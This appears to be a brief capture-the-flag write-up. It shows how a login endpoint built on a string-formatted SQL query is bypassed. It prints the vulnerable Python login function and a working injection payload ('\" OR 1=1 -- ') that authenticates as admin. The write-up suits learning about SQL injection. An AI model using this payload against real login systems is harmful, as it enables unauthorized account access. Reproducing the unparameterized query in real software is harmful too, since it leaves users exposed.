For this challange we will need to use SQL injection.
Upon loading the website we are greeted with a login page.
Checking the source code provided for the backend, we see that the username should be admin and the password is randomized.
However let's read the source code responsible for the authentication of the users:
def login(username, password):
# We should update our code base and use techniques like parameterization to avoid SQL Injection
user = query_db(f'SELECT password FROM users WHERE username = "{username}" AND password = "{password}" ', one=True)
if user:
token = createJWT(username)
return token
return False
This here is clearly vulnerable to an SQL injection attack. Sending the following payload to the login endpoint will allow us to log in as admin, and read the flag.
"username": "admin",
"password": "\" OR 1=1 -- "